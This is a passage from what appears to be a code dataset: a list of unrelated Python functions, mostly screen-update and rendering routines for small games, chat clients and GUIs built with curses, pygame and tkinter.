self.__redrawChat()\n self.__redrawUsers()\n self.__redrawChannels()\n self.__update()", "def game_updated(self):\n\n # replace with your game updated logic\n self.update_board()", "def _do_updates(self):\n is_right = self._puzzle.is_guess_right()\n if is_right:\n self._puzzle.reveal_puzzle()\n else:\n self._jumper.cut_line()", "def display(self, update_board=1):\n\tM,N = self.X, self.Y \n\tif not update_board:\n\t for i in range(0, M):\n\t\tfor j in range(0, N):\n\t\t\tif self.state.has_key( (i,j) ): \n\t\t\t self.scr.addch(j+1, i+1, self.char)\n\t\t\telse:\n\t\t\t self.scr.addch(j+1, i+1, ' ')\n\t self.scr.refresh()\n\t return\n\n\td={} ; self.boring=1\n\tfor i in range(0, M):\n\t L=range( max(0, i-1), min(M, i+2) )\n\t for j in range(0, N):\n\t\ts=0\n\t\tlive=self.state.has_key( (i,j) )\n\t\tfor k in range( max(0, j-1), min(N, j+2) ):\n\t\t for l in L:\n\t\t\tif self.state.has_key( (l,k) ):\n\t\t\t s=s+1\n\t\ts=s-live\n\t\tif s==3: \n\t\t # Birth\n\t\t d[i,j]=1 \n\t\t self.scr.addch(j+1, i+1, self.char)\n\t\t if not live: self.boring=0 \n\t\telif s==2 and live: d[i,j]=1 # Survival\n\t\telif live: \n\t\t # Death\n\t\t self.scr.addch(j+1, i+1, ' ')\n\t\t self.boring=0\n\tself.state=d\n\tself.scr.refresh()", "def _completed(self):\n if self._game.getLives() == 0: # loss\n self.view.clear()\n self._mssg = (GLabel(text=LOSS_MSSG, x=GAME_WIDTH/2, y=GAME_HEIGHT/2, font_size=16))\n else: # win\n self.view.clear()\n self._mssg = (GLabel(text='You won! (' + str(self._game.getPoints()) + ' Points)' +\n WIN_MSSG, x=GAME_WIDTH/2, y=GAME_HEIGHT/2, font_size=16))\n \n if self._new_n_press():\n self._state = STATE_NEWGAME\n self._mssg = None", "def update(self):\n self.clear()\n self.score += 1\n self.write(f\"Score : {self.score}\",\n align=\"center\", font=(\"Arial Black\", 20))", "def update(self):\n (cursory, cursorx) = self.entryscreen.getyx()\n (rows, cols) = self.chatscreen.getmaxyx()\n\n def message_lines(message):\n words = message.split()\n accum = words[0]\n words = words[1:]\n while len(words) > 0:\n while True: \n accum += \" \"\n if len(words[0]) >= cols - 3:\n # if the word is too huge to fit on the screen (note that\n # there's 3 spaces for padding), split it into parts\n first_part = words[0][:cols - len(accum)]\n words[0] = words[0][len(first_part):]\n accum += first_part\n elif len(accum) + len(words[0]) < cols:\n # otherwise, just grab this word off the front\n accum += words[0]\n words = words[1:]\n else:\n # the word is not too big to fit on the screen, but it\n # is too big for this line\n break\n # have we filled up accum? are we out of stuff to print?\n if len(accum) >= cols or len(words) == 0:\n break\n yield accum\n accum = \" \"\n lines = list(itertools.chain(*[message_lines(msg) for msg in self.history]))\n\n # we can only print up to rows number of lines, and we save the last row\n # for the status bar\n lines = lines[-(rows-1):]\n\n for (row, line) in zip(range(len(lines)), lines):\n self.chatscreen.addstr(row, 0, line) \n self.chatscreen.clrtoeol()\n\n self._drawstatus()\n\n self.entryscreen.move(cursory, cursorx)\n self.entryscreen.cursyncup()\n self.chatscreen.noutrefresh()\n self.entryscreen.noutrefresh()\n curses.doupdate()", "def display(self):\n # remove everything on canvas\n self.c.delete(tk.ALL)\n level = self.history[-1][1]\n\n for i, row in enumerate(level):\n for j, case in enumerate(row):\n if case in COLORS:\n self.c.create_rectangle(*box(i,j), fill=COLORS[case])\n if case in self.IMAGES:\n self.c.create_image(*center(i,j), image=self.IMAGES[case])\n\n self.undo_button.config(state = tk.DISABLED if len(self.history) == 1 else tk.NORMAL)\n if sk.has_won(level):\n self.c.create_text((self.width/2, self.height/2),\n text=\"You have won!\", fill='red',\n font=(\"Purisa Bold\", 55))\n self.undo_button.config(state = tk.DISABLED)\n self.help.config(text=\"Press n for next level, q to quit\")\n\n text = '{0} moves done'.format(len(self.history) -1) if self.history > 1\\\n else '1 move done'\n if self.undo:\n text += ' and {} undo'.format(self.undo)\n self.score_label.config(text=text)", "def update(self):\n self._curses_window.clear()\n\n self._curses_window.addstr(0, 0,\n \"{:5s} {:5.1f}\".format(\n 'time:', round(time() - self.simulation_start, 1)\n )\n + \"\\t{:13s} {:4.1f}\".format(\n ' steps per s:', round(1 / global_vars.step_duration, 1)\n )\n + \"\\t{:4s} {:4d}\".format(' step:', global_vars.step)\n\t\t\t+ \"\\n{:4s} {:4d}{:1s}\".format('Death cause.. eaten:', global_vars.h_eaten, 'h')\n\t\t\t+ \"\\t{:4s} {:4d}{:1s}{:4d}{:1s}\".format(\n 'starved:', global_vars.h_starved, 'h/', global_vars.c_starved, 'c'\n )\n\t\t\t+ \"\\t{:4s} {:4d}{:1s}{:4d}{:1s}\".format(\n 'trampled:', global_vars.h_trampled, 'h/', global_vars.c_trampled, 'c'\n )\n + \"\\t{:4s} {:4d}{:1s}{:4d}{:1s}\".format(\n 'natural death:', global_vars.h_age, 'h/', global_vars.c_age, 'c'\n )\n )\n\n self._curses_window.noutrefresh()", "def update_turn(self):\n pass", "def refresh_view(self):\n if self._step_number % 2 == 0:\n self._view.draw_enemies(self._game.enemies)\n self._view.draw_towers(self._game.towers)\n self._view.draw_obstacles(self._game.obstacles)", "def update(self):\n self.m.update()", "def render(self):\n step = 1\n while step < self.number_steps and self.update():\n step += 1", "def update_score_window(self):\r\n\r\n if not self.display_game:\r\n return\r\n\r\n if self.score_window is not None:\r\n self.score_window.update_window()", "def update_display(self):\r\n\t\tfor message in self._scheduled_messages:\r\n\t\t\tmessage['Delay'] -= 1\r\n\t\t\tif (message['Delay'] == 0):\r\n\t\t\t\tif (message['Parameter'] != None):\r\n\t\t\t\t\tmessage['Message'](message['Parameter'])\r\n\t\t\t\telse:\r\n\t\t\t\t\tmessage['Message']()\r\n\t\t\t\t\tdel self._scheduled_messages[self._scheduled_messages.index(message)]\r\n\r\n\t\tfor callback in self._timer_callbacks:\r\n\t\t\tcallback()\r\n\t\tself._timer = (self._timer + 1) % 256\r\n\t\tif(self._timer == 0):\r\n\t\t\tself._selector._shift_pressed_timer = -12\r\n\t\tself.flash()", "def update_info(self):\n self.m_canvas.master.m_informations_displayer.set_operations(\n self.m_current_index\n )\n self.m_canvas.master.m_informations_displayer.set_time(\n self.m_history[self.m_current_index].m_passed_time\n )", "def update(self):\r\n pygame.display.update()\r\n return", "def update(self):\n gear_message = \"GEAR COLLECTED: %d\" % \\\n self.__num_gear_collected + \"/4\"\n self.image = self.__font.render(gear_message, 1, (255, 255, 255))\n self.rect = self.image.get_rect()\n \n # This message is positioned in the top-left corner of the screen\n self.rect.topleft = (10, 10)", "def render(self):\n i_start, _, width = self.screen_status\n\n if self.replay_tt is not None:\n aix_replay = bisect.bisect_left(\n self.replay_elapsed, self.tt.elapsed_seconds\n )\n aix_replay = min(self.replay_tt.n_actions - 1, aix_replay)\n i_replay = self.replay_uactions[aix_replay][0]\n\n if self.target_wpm is not None:\n i_target = self.tt.elapsed_seconds * 5 * self.target_wpm / 60\n i_target = min(self.tt.n_characters - 1, int(i_target))\n\n # rended text\n i_print = i_start\n current_ix_print = i_start\n for i, (alist, ch) in enumerate(zip(self.tt.actions, self.tt.text)):\n y, x = divmod(i_print, width)\n\n if i == self.current_ix or not alist:\n # character that we stand on needs to have backspace styling\n status = STATUS_BACKSPACE # same styling\n else:\n status = alist[-1].status\n\n if self.replay_tt is not None and i == i_replay != self.current_ix:\n if status in {STATUS_BACKSPACE, STATUS_CORRECT}:\n # Make sure the normal cursor is visible\n status = \"replay\"\n\n if self.target_wpm is not None and i == i_target != self.current_ix:\n if status in {STATUS_BACKSPACE, STATUS_CORRECT}:\n # Make sure the normal cursor is visible\n status = \"target\"\n\n if i == self.current_ix:\n current_ix_print = i_print\n\n if ch == \"\\n\":\n i_print += width - (i_print % width)\n self.pens[status].addch(self.stdscr, y, x, \" \")\n elif ch == \"\\t\":\n i_print += 4\n self.pens[status].addstr(self.stdscr, y, x, 4 * \" \")\n else:\n i_print += 1\n self.pens[status].addch(self.stdscr, y, x, ch)\n\n # render cursor\n self.cursor.move_abs(self.y_start, self.x_start + current_ix_print)\n\n self.stdscr.refresh()", "def update_current_screen(self):\n\t\tself.current_screen.update()", "def updateWidget(self):\n\n if self.frame1.state() == 'normal':\n self.frame2.deiconify()\n self.frame1.withdraw()\n else:\n self.frame2.withdraw()\n self.frame2.update()\n self.frame2.deiconify()\n self.frame1.title(\"%s's turn\" % self.usernames[1])\n self.frame2.title(\"%s's turn\" % self.usernames[0])\n showDialogBox(\"%s's turn first!\" % self.usernames[0])\n self.frame1.update()\n self.frame2.update()", "def _update_screen(self):\n self.screen.fill((250,250,250))\n self.rocket.blitme()\n pygame.display.flip()", "def _update_display(self, loop=True):\n\n sensors_data = self.get_sensors_data()\n\n if self.current_item.entity_type is WeatherEntityType.TEMPERATURE:\n pixels = self.current_item.show_pixels(sensors_data[0])\n elif self.current_item.entity_type is WeatherEntityType.HUMIDITY:\n pixels = self.current_item.show_pixels(sensors_data[2])\n else:\n pixels = self.current_item.show_pixels(sensors_data[3])\n\n self._sense_hat.set_rotation(self.current_style.rotation)\n self._sense_hat.set_pixels(pixels)\n\n if loop:\n self._update_timer = self._start_timer(Config.UPDATE_INTERVAL, self._update_display)", "def update(self, board):\n self.update_border()\n self.update_score_and_level(board)\n self.update_next_piece(board)\n\n self.update_settled_pieces(board)\n\n self.update_falling_piece(board)\n self.update_shadow(board)\n\n self.refresh_screen()", "def updateScreen(self) -> None:\n\n # fill game display black\n self.surface.fill(Colors.Black)\n\n # draw players and ball\n self.drawImageOnSurface(self.player_one)\n self.drawImageOnSurface(self.player_two)\n self.drawImageOnSurface(self.ball)\n\n # draw all the spacer images\n for image in self.spacers:\n self.drawImageOnSurface(image)\n\n # draw scores and format the scores in byte representation\n self.drawTextOnSurface(format(self._score[0], \"04b\"),\n (Configuration.windowWidth / 4, Configuration.windowHeight / 2), Colors.ByteGreen,\n font=self.font)\n self.drawTextOnSurface(format(self._score[1], \"04b\"),\n (3 * Configuration.windowWidth / 4, Configuration.windowHeight / 2), Colors.ByteGreen,\n font=self.font)\n\n super().updateScreen() # call the parent method to update the screen", "def remote_update(self, increment):\r\n\r\n self.window += increment", "def update(self):\n self.screen.fill(blackColor)\n self.model.blocks.draw(self.screen)\n self.model.players.draw(self.screen)\n self.model.buttons.draw(self.screen)\n self.model.Coins.draw(self.screen)\n p1Score = myfont.render(\"Player 1 Score:\"+str(self.model.player1.score), 1, whiteColor)\n self.screen.blit(p1Score,(100,15))\n if self.model.playernum==2:\n p2Score = myfont.render(\"Player 2 Score:\"+str(self.model.player2.score), 1,whiteColor)\n self.screen.blit(p2Score,(1200,15))\n timerLimit = myfont.render(\"Time Limit:\" +str(self.model.time), 1, whiteColor)\n self.screen.blit(timerLimit, (700, 15)) \n pygame.display.update()", "def _update_screen(self):\n\t\tself.screen.fill(self.settings.bg_color)\n\t\tself.pigeon.blitme()\n\t\tfor dropping in self.droppings.sprites():\n\t\t\tdropping.draw_dropping()\n\t\tself.autos.draw(self.screen)\n\n\t\t# Draw the score information.\n\t\tself.sb.show_score()\n\n\t\t# Draw the play button if the game is inactive.\n\t\tif not self.stats.game_active:\n\t\t\tself.play_button.draw_button()\n\n\t\t# Make the most recently drawn screen visible.\n\t\tpygame.display.flip()", "def updateDisplay(self):\n if self._displayPjt:\n self._displayPjt.updateim()\n if self._displayUsr:\n self._displayUsr.updateim()\n if self._displayVtk:\n self._displayVtk.updateim()", "def display(self, takeTurn, level, playerMessage=\"\"):\n messages = [playerMessage]\n if takeTurn:\n # Turns\n stateCopy = self.copyState()\n for row in stateCopy[level]:\n for entity in row:\n if entity is not None:\n turnMessage = entity.onTurn()\n if turnMessage is not \"\": \n messages.append(turnMessage)\n # Deaths\n for i in range(self.rows-1):\n for j in range(self.cols):\n if self.state[level][i][j] is not None:\n if not self.state[level][i][j].alive:\n # kill the entity. If after calling onDeath() the\n # entity at [i][j] is not the same as the entity \n # that was there before (i.e. onDeath() spawned a\n # new entity there) then do nothing, but otherwise\n # set the entity at [i][j] to null\n tmp = self.state[level][i][j]\n self.state[level][i][j].onDeath()\n if self.state[level][i][j] == tmp:\n self.state[level][i][j] = None\n if self.player:\n messages.insert(0, self.player.getState())\n # Printing\n for i in range(self.rows-1):\n for j in range(self.cols):\n if self.state[level][i][j] is None or not self.state[level][i][j].alive:\n self.scr.addch(i, j, '.')\n else:\n self.scr.addstr(i, j, self.state[level][i][j].body)\n\n\n # Some of the messages will have newlines in them, which could make\n # this try to print off screen. So split the elements of messages at\n # the newlines\n splitMessages = []\n for msg in messages:\n splitMessages += msg.splitlines()\n\n # Can only display the last (msgBufferSize) messages, so pop all others\n for i in range(len(splitMessages) - msgBufferSize):\n splitMessages.pop(1) # 1, not 0 b/c must keep the player info\n\n # Wipe all text in message area before printing. Otherwise could have\n # old messages showing when they shouldn't be \n for i in range(msgBufferSize):\n self.scr.addstr(self.rows+i, 0, \" \"*self.cols)\n\n # Finally print the messages\n for line in range(len(splitMessages)):\n self.scr.addstr(self.rows+line, 0, splitMessages[line])\n self.scr.refresh()\n return", "def update(self, msg):\n pass", "def draw(self):\n self.screen.fill(Color.BLACK)\n self.screen.blit(self.red_block, self.apple)\n [self.screen.blit(self.green_block, xy) for xy in self.snake]\n self.screen.blit(self.white_bar, (0, 0))\n self.draw_text(str(self.score), self.score_pos, size=32)\n pygame.display.flip()", "def update(self):\n\n print(\"---\\n |\\n |\")\n print(self.__body__, \"\\n\\n\")", "def set_display_message(self, title=\"\", speaker=\"\"):\r\n if self.recording:\r\n self.talkInfoString.setText(\"RECORDING\\n\\nTime remaining:\")\r\n else:\r\n self.talkInfoString.setText(\"NEXT TALK\\nTitle: %s\\nSpeaker: %s\\n\\nTime until recording:\" % (title, speaker))", "def _display_loop(self):\n # Get & handle user input\n self._handle_input(self.screen.getch())\n\n # Only update if there's something to do - Improves performance drastically\n if self.updated:\n # Reset screen\n self.screen.clear()\n self.updated = False\n\n # Commands header & highlight current command\n self.screen.addstr('Every {:.1f}/{:.1f}s: | '.format(self.interval, self.cycle_interval), self.base_color)\n for i, command in enumerate(self.commands_str):\n self.screen.addstr(command, self.highlight_color if i == self.current_idx else self.base_color)\n self.screen.addstr(' | ', self.base_color) # Pad between commands\n\n # Add current date & time to header, pad to end of the line based on current position\n pad = self.max_col - self.screen.getyx()[-1] - self.time_pad\n self.screen.addstr(' '*pad + self.time_str + '\\n', self.base_color)\n\n # Display the current command's output\n self._display_command()\n\n self.screen.refresh() # Refresh must go before delay!\n time.sleep(self.DELAY) # Small delay to avoid stuttering but allow for smooth scrolling", "def update_talk(self):\r\n selected_talk = self.tableView.currentIndex()\r\n if selected_talk.row() >= 0: # The tableView index begins at 0 and is -1 by default\r\n talk_id = selected_talk.sibling(selected_talk.row(), 0).data().toString()\r\n presentation = self.create_presentation(self.talkDetailsWidget)\r\n\r\n if presentation:\r\n self.db.update_presentation(talk_id, presentation)\r\n self.apply_changes(selected_talk)\r\n self.talkDetailsWidget.saveButton.setEnabled(False)", "def update_mug(self, msg):\n # Create a transform from the wrist to the mug\n posn = [0, 0, 0.140]\n ornt = [0, 0.707, 0, 0.707]\n t_i = rospy.Time.now()\n self.send_pose(posn, ornt, \"right_hand\", \"mug_frame\", t_i)\n xform = self.tfBuffer.lookup_transform(\n \"base\", \"mug_frame\", rospy.Time(0))\n load_xform_into_pose(xform.transform, self.marker.pose)\n self.pub.publish(self.marker)", "def _show_message(self, message, message_color, background_color=(0, 0, 0)):\n\n # Need to be sure we revert any changes to rotation\n self._sense_hat.rotation = 0\n self._sense_hat.show_message(message, Config.SCROLL_TEXT_SPEED, message_color, background_color)", "def refresh_chat(self):\n self.chat_container.noutrefresh()\n self.chat_win.noutrefresh()\n curses.doupdate()", "def update(self):\n self.active = False\n self.top.update(self.rgb,self.cmyk,self.hsv)\n self.bot.update(self.rgb,self.cmyk,self.hsv)\n self.active = True", "def update_score_board(self):\n score = ''\n for key, value in self.model.game_score.items():\n score += key + \"-\" + str(value) + ':'\n if self.view.score_board_entry.get():\n self.view.score_board_entry.delete(0, tkinter.END)\n self.view.score_board_entry.insert('1', score)", "def redraw(self):\r\n self.c.update()", "def refresh(self) -> None:\n self.screen.refresh()", "def update(self):\n if self.pinky_wins:\n fill(1)\n textSize(50)\n text(\"PINKY WINS\", self.WIDTH/2 - 140, self.HEIGHT/2)\n if self.player_wins:\n fill(1)\n textSize(50)\n text(\"YOU WIN!!!\", self.WIDTH/2 - 140, self.HEIGHT/2)", "def update_window(self, window, frame):\n self.draw_eyes()\n self.show(window, frame)\n self.new_frame()", "def progress_game(self):\r\n\r\n if self.actions == len(self.players):\r\n # Reveal the 3 first cards\r\n output_text = \"Dealing the flop...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.flop()\r\n\r\n if self.actions == 2 * len(self.players):\r\n # Reveal a 4th card\r\n output_text = \"Dealing the turn...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.turn()\r\n\r\n if self.actions == 3 * len(self.players):\r\n # Reveal a 5th card\r\n output_text = \"Dealing the river...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.river()\r\n\r\n if self.actions == 4 * len(self.players):\r\n self.showdown()", "def screen_update(fill_blank=True):\n clear_screen()\n\n if g.content:\n xprint(g.content)\n\n if g.message or g.rprompt:\n length = c.charcount\n out = g.message or ''\n blanks = getxy().width - length(out) - length(g.rprompt or '') - 3\n out += ' ' * blanks + (g.rprompt or '')\n xprint(out)\n\n elif fill_blank:\n xprint(\"\")\n\n g.message = g.content = g.rprompt = False", "def paint(self):\n correct_guesses = 0\n while not self.to_stop:\n if correct_guesses >= 2:\n self.server_socket.send('end1;'.encode())\n try:\n x_and_y = self.server_socket.recv(1024).decode() # decrypting the data from the server.\\\n pos = x_and_y.split(\";\") # separating x and y\n if pos[0] == 'score':\n self.score += int(pos[1])\n correct_guesses += 1\n score_headline = Label(self.root2, text='score: ' + str(self.score), font=('bubble', 15), # the score\n bg='white', fg=\"black\", relief=\"solid\")\n score_headline.place(x=10, y=50)\n elif 'end' in x_and_y:\n self.to_stop = True\n else:\n try:\n if self.can_draw:\n for i in range(0, len(pos)-2, 2):\n x = int(pos[i])\n y = int(pos[i + 1])\n self.x, self.y = x, y\n x2, y2 = (x + 1), (y + 1)\n self.cv.create_oval((self.x, self.y, x2, y2), fill='black', width=5)\n except TclError:\n self.to_stop = True\n except ConnectionResetError:\n print(\"user disconnected\")\n except:\n print('an error ecourred')", "def render(self):\n # Get current window size\n h_new, w_new = self.stdscr.getmaxyx()\n # If the window has been resized\n if not (self.h == h_new and self.w == w_new):\n self.h, self.w = h_new, w_new # Update window dimensions\n # Clear the current window\n self.stdscr.clear()\n # Restore message count and y so all messages gets rerendered\n self.msg_count = 0\n self.curr_y = 0\n # Calculate how many lines for each message\n line = self.calc_lines()\n # Delete old messges to fit the new messages in\n self.del_old_msg(line)\n # Render unrendered messages\n for i, msg in enumerate(self.message_log[self.msg_count:]):\n self.msg_count += 1\n try:\n self.render_message(msg['user'], msg['msg'], mode=msg['mode'])\n except curses.error:\n return\n # Clear screen after the last message\n for offset in range(self.h - self.curr_y - 1):\n try:\n self.stdscr.hline(self.curr_y + offset, 0, ord(' '), self.w)\n except curses.error:\n return\n # Render text input\n try:\n self.render_input()\n except curses.error:\n return\n # Refresh window\n self.stdscr.refresh()", "def update(self):\n if self.game_over is False:\n self.player_turn = not self.player_turn\n self.turn_display_timer = self.TURN_TEXT_TIMER", "def upd_view():\n global state, current_view, show_actives, current_filename\n nonlocal img, listbox\n\n with data_lock:\n if state == 1:\n current_filename = None\n state = 2\n listbox.delete(0, tk.END)\n for item in current_view.actions.by_type(wtl.actions.Click):\n wtl_uid = str(item.target.wtl_uid)\n text = item.target.metadata[\"text\"]\n listbox.insert(tk.END, wtl_uid + f\" ({text})\")\n\n if state == 2:\n filename = \"first\" if show_actives.get() == 0 else \"is_active\"\n if filename != current_filename:\n current_filename = filename\n current_view.snapshot.screenshots[filename].save(Path(\".\"))\n img = tk.PhotoImage(file=f\"{filename}.png\")\n canvas.create_image(5, 5, anchor=tk.NW, image=img)\n\n window.after(250, upd_view)", "def draw(self):\n self._background.draw(self.view)\n if self._state == STATE_INACTIVE:\n self._message.draw(self.view)\n if self._state == STATE_COUNTDOWN:\n self._game.draw(self.view)\n self._countdownMessage.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_ACTIVE:\n self._game.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_PAUSED:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)\n if self._state == STATE_RESET:\n self._message.draw(self.view)\n if self._state == STATE_COMPLETE:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)", "def display_result(self) -> None:\n winner = self.state.winner\n if winner:\n self._display_message(winner + ' wins!')\n else:\n self._display_message('Draw')\n\n self._display_message(\n f'\\n{self.state.player1} has {self.state.player1_score} wins'\n )\n self._display_message(\n f'{self.state.player2} has {self.state.player2_score} wins\\n'\n )", "def draw(self):\n self.window.clear()\n # Draw heads up display\n views.hud(self)\n # Refresh the messages on screen\n queue.draw(self.window)\n # Draw the map\n self.camera.draw(self.window, self.world, point=(self.player.x, self.player.y))", "def draw(self):\n ui.clear()\n ui.draw_board(self)\n ui.output_buffer()", "def show_message(message, col=c.r, update=False):\n g.content = generate_songlist_display()\n g.message = col + message + c.w\n\n if update:\n screen_update()", "def update(self):\n message = \"SCORE = %d\" % self.score\n self.image = self.__font.render(message, 1, (255, 255, 255))\n self.rect = self.image.get_rect()\n self.rect.centerx = 240\n self.rect.centery = 50", "def update_screen(self, ai_game):\r\n self.surface.fill(self.settings.bg_color)\r\n self.ship.blitme()\r\n for bullet in self.ship_bullets.sprites():\r\n bullet.draw_bullet()\r\n for bullet in self.alien_bullets.sprites():\r\n bullet.draw_bullet()\r\n self.aliens.draw(self.surface)\r\n self.explosions.draw(self.surface)\r\n\r\n # Draw the score information.\r\n self.sb.show_score()\r\n\r\n # Draw the difficulty buttons if the game is inactive.\r\n if not self.stats.game_active:\r\n for button in self.buttons:\r\n button.draw_button()\r\n\r\n # Draw the game over message if appropriate\r\n if self.stats.game_over:\r\n self.surface.blit(self.game_over_text, self.game_over_text_rect)\r\n\r\n # Make the most recently drawn screen visible.\r\n self.screen.blit(self.surface, (0, 0))\r\n pg.display.flip()", "def update(self, msg):\r\n self.msgVar.set(msg)", "def update(self, msg):\r\n self.msgVar.set(msg)", "def updateWindow(gameWindow, figurelist, rounds):\n for item in gameWindow.items[:]:\n item.undraw() #Remove al elements in game window\n\n gameWindow.update() #update to ensure al is gone\n\n for i in range(15): #For loops to draw new figures\n for k in range(25):\n todraw = figurelist[i][k]\n todraw.draw(gameWindow)\n \n scoreText = str(\"Pick number:\" + str(rounds)) #Show how many times a color has been picked(Shows 1 on first round)\n toPrint = g.Text(g.Point(100, 775), scoreText) #Create text to print\n\n toPrint.draw(gameWindow) #Draws text with rounds", "def phase_7(self):\n\n test_board_1 = board(5, 5, snake_init_coordinates = [4, 2], fruit_init_coordinates = [0, 2])\n render = Render_engine('terminal', test_board_1)\n print(\"Before grow\")\n print(\"*******************************\")\n render.render_terminal(test_board_1)\n print(\"Now, Snake's length is {}\".format(len(test_board_1.Snake)))\n\n print(\"\\n\\nafter grow once\")\n print(\"*******************************\")\n test_board_1.Snake_grow(\"right\")\n test_board_1.Update_board()\n render.render_terminal(test_board_1)\n print(\"Now, Snake's length is {}\".format(len(test_board_1.Snake)))\n\n print(\"\\n\\nafter grow twice\")\n print(\"*******************************\")\n test_board_1.Snake_grow(\"right\")\n test_board_1.Update_board()\n render.render_terminal(test_board_1)\n print(\"Now, Snake's length is {}\".format(len(test_board_1.Snake)))\n\n print(\"\\n\\nafter grow three times\")\n print(\"*******************************\")\n test_board_1.Snake_grow(\"right\")\n test_board_1.Update_board()\n render.render_terminal(test_board_1)\n print(\"Now, Snake's length is {}\".format(len(test_board_1.Snake)))", "def _update_display(self, game, action):\n canvas_coord = self._havannah_coord_to_canvas_coord(action.coord)\n canvas_color = self._havannah_color_to_canvas_color(action.color)\n self._draw_hex(canvas_coord, canvas_color)", "def update_display(self):\n self.lick_plot_0.setData(self.k+self.T,self.buffer[:,1]) \n self.lick_plot_1.setData(self.k+self.T,self.buffer[:,2]) \n self.breathing_plot.setData(self.k+self.T,self.buffer[:,0]) \n \n if self.settings.movie_on.value():\n self.camera_image.setImage(self.camera.read())\n if self.settings.save_movie.value():\n self.camera.write()\n \n #print(self.buffer_h5.size)", "def run(self):\r\n \r\n if not self.gameOver:\r\n screen.fill(COLOR3)\r\n self.board.drawBoard()\r\n self.handleEvents()\r\n for piece in self.board.pieces.values():\r\n piece.update()\r\n else:\r\n self.resetGame()\r\n pygame.display.update()", "def update(self,msg):\r\n print msg[0]\r\n if msg[0]==\"End Of Building\":\r\n self.view.Classify_Button.configure(state=\"normal\") \r\n self.view.show_updates(\"\"+\"\",\"all done it took \"+str(time.time()-self.start))\r\n self.__rang=msg[1]\r\n self.__numeric=msg[2]\r\n self.__statistics=msg[3]\r\n self.__k=msg[-3]\r\n self.__classes=msg[-2]\r\n self.__abs_n=msg[-1]\r\n self.view.update(\"Build is done, please click on Classify.\")\r\n\r\n elif msg[0]==\"All Done\":\r\n self.view.show_updates(\"\"+\"\",\"all done it took \"+str(time.time()-self.start))\r\n self.view.update(\"All Done Open \"+os.path.join(self.__path,'Output.txt')+\" for results.\")\r\n else:\r\n self.view.show_updates(\"Last operation: \"+self.prevmsg,\"Now working on \"+msg[0])\r\n self.prevmsg=msg[0]", "def update_score_other_rounds(self, match):\n self.match_views.update_score(match)", "def update(self):\n self.redraw()\n self._changed = False", "def update(self):\n self.redraw()\n self._changed = False", "def redrawWindow(surface):\r\n global rows, width, s, snack\r\n surface.fill((0,0,0)) # fill whole window with black colour\r\n s.draw(surface) #put snake in window\r\n snack.draw(surface) #put snack in window\r\n drawGrid(width,rows, surface) #draw grid structure\r\n pygame.display.update() #displays updated window\r", "def draw(self, draw_surface):\n self.confirmed_dialogue.draw(draw_surface)", "def play_game(self):\n print('Welcome to Tetris! To play, press \"j\" to move Left, \"l\" to move Right, and \"k\" to '\n 'Invert the piece.')\n raw_input('Press any key to acknowledge.')\n board.add_piece()\n board.display_piece()\n board.display_board()\n while True:\n over = board.update_board_and_check_for_eog()\n if over:\n print over\n break\n board.display_board()\n start = time.time()\n while time.time() - start < self.refresh_rate:\n direction = board.get_input() # right, left\n if direction:\n board.display_piece(clear=True)\n board.move_piece(direction=direction)\n board.display_board()\n time.sleep(0.1)\n print 'You got {} points!'.format(board.points)\n return", "def win(self):\n self.score += 1\n self.ids['score'].text = 'SCORE: ' + str(self.score)", "def __redrawChat(self):\n self.__chatWin.clear()\n chats = self._client.currentChannel().chatHistory()\n count = min(len(chats), self.__chatWin.getmaxyx()[0])\n shown = chats[-count:]\n for c in shown:\n self.__chatWin.addstr(c + \"\\n\")\n\n self.__update()", "def guess_mode(self):\n self.can_draw = True\n timer_thread = threading.Thread(target=self.timer) # starting a timer\n timer_thread.daemon = True\n timer_thread.start()\n\n headline = Label(self.root2, text=self.username) # the name of the user on top of the screen.\n headline.pack()\n self.cv.pack()\n score_headline = Label(self.root2, text='score: ' + str(self.score), font=('bubble', 15), # the score\n bg='white', fg=\"black\", relief=\"solid\")\n score_headline.place(x=10, y=50)\n strikes_headline = Label(self.root2, text='strikes: ' + str(self.strikes), font=('bubble', 15),\n bg='white', fg=\"black\", relief=\"solid\") # the strikes the user have left.\n strikes_headline.place(x=10, y=20)\n guess = Entry(self.root2, relief='solid', font=('bubble', 10), bg='white', fg=\"black\")\n guess.delete(0, END)\n guess.insert(0, 'enter a guess')\n guess.place(x=100, y=400)\n submit_button = Button(self.root2, text=\"submit\", relief=\"solid\",\n font=('cooper black', 10), fg=\"black\", bg=\"#%02x%02x%02x\" % (255, 255, 255),\n command=lambda: self.check_guess(guess, submit_button))\n submit_button.place(x=400, y=400)\n server_handler = threading.Thread(target=self.paint)\n server_handler.daemon = True\n # creating a thread that handles with the data the server sends to the client, w function 'paint'.\n server_handler.start()\n self.root2.mainloop()", "def _refresh_render(self):\n current_frame = self.frame\n self.frame = int(1E6)\n self.frame = current_frame", "def update(self):\n self.screen.blit(self.dial, (DIAL_POS))\n self.screen.blit(self.rotatedImage, self.rotatedImageRectangle)", "def update_screen(self):\r\n\r\n # Redraw the screen during each pass through the loop.\r\n self._screen.fill(self._bb_settings.bg_color)\r\n\r\n # Redraw all markers around edge of board\r\n\r\n # Draw the play button if the game is inactive\r\n if self._stats.get_status() == \"Start_game\":\r\n for button in self._play_mode_button_list:\r\n button.draw_button()\r\n elif self._stats.get_status() == \"replay\":\r\n for button in self._replay_button_list:\r\n button.draw_button()\r\n else:\r\n self.blitme()\r\n shoot_markers = self.get_entry_exit()\r\n atom_markers = self.get_atom_guess()\r\n for marker in shoot_markers.values():\r\n marker[1].draw_marker()\r\n for atom in atom_markers.values():\r\n atom.draw_marker()\r\n # Make the most recently drawn screen visible.\r\n pygame.display.flip()", "def update_stockfish(self):\n if (self.show_stockfish and\n \"pscore\" in self.game.info[self.halfmove]):\n self.stock_buffer.set_text(\n (\"Score: {pscore:.1f} ({score})\\n\" +\n \"Depth: {depth} ({seconds:.1f} sec)\\n\" +\n \"PV : {pv}\").format(\n **self.game.info[self.halfmove]))\n else:\n self.stock_buffer.set_text(\"\")", "def render(self):\n self.screen.reset()\n\n # draw snake\n surface = pymlgame.Surface(self.screen.width, self.screen.height)\n for part in self.snake.parts:\n surface.draw_dot(part, pymlgame.RED)\n self.screen.blit(surface)\n\n # draw apple\n self.screen.blit(self.apple_surface, self.apple)\n\n if 